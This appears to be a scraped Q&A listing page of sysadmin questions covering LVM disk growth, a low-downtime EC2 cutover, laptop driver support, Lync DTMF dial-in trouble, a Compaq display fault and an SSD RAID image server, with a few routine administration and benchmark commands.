    A bonus question: if I go with my current plan, would you recommend creating partitions on the disks (pvcreate /dev/sdX1 vs pvcreate /dev/sdX)? I think it's against convention to use raw disks without partitions, but it would make it a bit easier to grow the disks if that is ever needed. This is all just a matter of taste, right?
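    For reference, the online-grow path mentioned above is only a few commands once the virtual disk itself has been enlarged in vSphere; a sketch assuming a PV on /dev/sdb and a logical volume named vg0/data (all placeholder names):

        pvresize /dev/sdb               # pick up the enlarged physical disk
        lvextend -L +50G /dev/vg0/data  # grow the logical volume by 50 GB
        resize2fs /dev/vg0/data         # ext3 supports online growth while mounted

    With a partition (/dev/sdX1) there is the extra step of growing the partition first, which is exactly the trade-off raised in the bonus question.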

    Read the article

  • Production deployment to EC2 with minimal downtime

    - by jensendarren
    I have a simple web application deployed on a large EC2 instance. I now want to deploy the latest code to this server, but I want to do it in a way that minimizes downtime and is as smooth as possible for the end user. Here is my plan:

        1. Fire up another large instance.
        2. Install all the software layers on that instance.
        3. Restore and attach an EBS drive to the instance.
        4. Deploy our latest production-ready code on the new instance.
        5. Run all tests (including manual testing of the application).
        6. (If tests pass) Put a "Site Under Maintenance" notice on the live site.
        7. Back up the EBS volume on the live site.
        8. Detach the EBS volume from the new server and replace it with the latest backup.
        9. Use ec2-associate-address to move the IP address to the new instance.
        10. Sit back and wait for traffic to start flowing through the new instance.
        11. Terminate the old instance.

    Does this seem like a good strategy? Are there any tutorials or books that might cover this topic? I have already read Cloud Application Architectures by George Reese, which is an excellent book, but it does not cover deployment. Additionally, I know there are tools that can help with this, like RightScale or enStratus, which I will use when I start using more than one instance.
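    A sketch of step 9, the actual cutover (syntax from the classic ec2-api-tools and worth verifying against your tool version; the address and instance ID are placeholders):

        # See which instance currently holds the Elastic IP
        ec2-describe-addresses

        # Re-point it at the new instance; remapping takes only seconds,
        # which is what keeps the maintenance window short
        ec2-associate-address 198.51.100.7 -i i-0123abcd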

    Read the article

  • Laptop Most Likely to Have Good Driver Support

    - by ShabbyDoo
    Through numerous bad experiences, I have learned that the most likely cause of laptop "failure" is the lack of updated drivers for new operating systems. As an example, I have a perfectly good Thinkpad T42 at home which runs Windows 7 just fine for my purposes except that no compatible ATI video drivers are available, and the generic drivers have flicker effects. I recently saw an ASUS laptop which looked quite nice except that I would be beholden to them to release ATI video driver updates customized for it. And, I can't trust them to do that for more than six months. What laptops (manufacturer/line) should I consider so that I could expect at least a couple years of frequent updates? I plan on running Windows 7 and installing whatever successor comes out. I like Intel components (especially WiFi) because I can install their drivers directly from them, and they have a long history of providing updates for years after shipping a particular component. More generally, components from companies which are likely to update drivers frequently are good as long as I can install the component manufacturer-provided drivers without laptop-specific customization (like the ATI drivers). Also, if a component can be replaced easily, I am less concerned. For example, Dell stopped pumping out updated drivers for one of its mini-PCI WiFi cards. The solution was to buy an Intel replacement on eBay for $12! That's fine. I can deal with that. So, what laptops should I consider so that I'm not likely to be stuck between a rock and a hard place?

    Read the article

  • Lync 2010 dial-in to meeting DTMF issue

    - by user140116
    We are facing an issue with Lync 2010 dial-in to a meeting. We redirect an Asterisk number to Lync, which connects successfully to the Lync dial-in plan. After calling the given number from an external network, we hear Lync answering and prompting us to enter the PIN followed by the hash key. I should mention that all other calls from Asterisk to Lync and vice versa route successfully, and all DTMF we send to Asterisk from the phone (IVR, extension, PIN etc.) also routes fine. But after we enter the appropriate PIN followed by the hash key, we get "Sorry, I can't find a meeting with that number". Some pros mentioned that it might be dtmfmode=RFC2833 or dtmfmode=auto in Asterisk (all checked and tried). Some pros mentioned that there is a general problem with Lync and DTMF (even with Cisco Call Manager). Other pros mentioned that the "Enable refer support" check box in Voice Routing\Trunk Configuration in Lync has to be unchecked (also tested). The problem still remains, and there is no way to enter a meeting room by dial-in. Any idea would be appreciated!

    Read the article

  • COMPAQ Tower No Signal to monitor

    - by Lancelot
    I received a Compaq tower from a friend: a Compaq Presario SR1224NX (onboard VGA, Windows XP SP2). My plan was to turn it into an Ubuntu server. It booted up with no problems, even with the Ubuntu live disc. After a normal shutdown (not unplugging the power cord, and not a hard shutdown with the power button), it would not restart, even after SEVERAL attempts. I noticed the light next to the power supply would flash very rapidly. I researched and found it was one of two things: a dead power supply, or faulty cables to the motherboard and disks. I checked the cables and they were fine, so I purchased a new power supply (400 watts; the original had 250) and installed it. The tower was then able to boot into the live disc and everything. But after a normal shutdown, it now restarts without sending any signal to my monitor. I have tried several ACER monitors which I know work perfectly, but not with this tower (I recall that it did show a display right after I replaced the power supply). This is different from most "no signal" problems, since I am not using an external video card; this is onboard VGA.

    Read the article

  • setup lowcost image storage server with 24x SSD array to get high IOPS?

    - by Nenad
    I want to build, let's call it, a low-cost Ra*SAN which would host the images for our social site (many millions of them). We have 5 sizes of every photo, at 3 KB, 7 KB, 15 KB, 25 KB and 80 KB per image. My idea is to build a server with 24 consumer 240 GB SSDs in RAID 6, which will give me some 5 TB of disk space for photo storage. For HA I can add a second one and use DRBD. I'm looking to get above 150,000 IOPS (4K random reads). As we mostly have read-only access and rarely delete photos, I'm thinking of going with consumer MLC SSDs. I've read many endurance reviews and don't see a problem there, as long as we don't rewrite the cells. What do you think of my idea?

        - I'm not sure between RAID 6 or RAID 10 (more IOPS vs. SSD cost).
        - Is ext4 OK for the filesystem?
        - Would you use 1 or 2 RAID controllers, with an extender backplane?

    If anyone has built something similar, I would be happy to get real-world numbers.

    UPDATE: I have bought 12 (plus some spares) OCZ Talos 480 GB SAS SSD drives. They will be placed in a 12-bay DAS and attached to a PERC H800 controller (1 GB NV cache, manufactured by LSI, with FastPath). I plan to set up RAID 50 with ext4. If someone is wondering about benchmarks, let me know what you would like to see.
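    Since benchmarks came up: fio is the usual way to measure a 4K-random-read target like 150,000 IOPS. A sketch (device path, job count and queue depth are placeholders to tune; random reads against a raw device are non-destructive, but double-check the target before pointing it at anything):

        fio --name=4krandread --rw=randread --bs=4k --direct=1 \
            --ioengine=libaio --iodepth=32 --numjobs=8 --group_reporting \
            --runtime=60 --time_based --filename=/dev/sdX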

    Read the article
